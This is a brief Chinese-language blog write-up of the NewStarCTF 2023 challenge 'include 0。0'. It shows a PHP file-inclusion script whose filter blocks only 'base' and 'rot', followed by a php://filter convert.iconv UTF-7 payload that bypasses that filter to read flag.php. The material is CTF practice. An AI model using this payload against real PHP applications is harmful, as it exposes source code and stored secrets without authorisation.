[NewStarCTF 2023 公开赛道]include 0。0

2024-10-23

95- 1m- -

[NewStarCTF 2023 公开赛道]include 0。0

<?php
highlight_file(__FILE__);
// FLAG in the flag.php
$file = $_GET['file'];
if(isset($file) && !preg_match('/base|rot/i',$file)){
  @include($file);
}else{
  die("nope");
}
?>

我们发现代码过滤了base和rot，但没过滤convert.iconv，因此我们可硬将utf-8转为utf-7来输出flag.php的内容

1	?file=php://filter/convert.iconv.utf-8.utf-7/resource=flag.php

我很可爱，请给我钱

Post author: kinsey
Post link: https://kinsey973.github.io/2024/10/23/NewStarCTF-2023-%E5%85%AC%E5%BC%80%E8%B5%9B%E9%81%93-include-0%E3%80%820/
Copyright Notice: All articles in this blog are licensed under unless otherwise stated.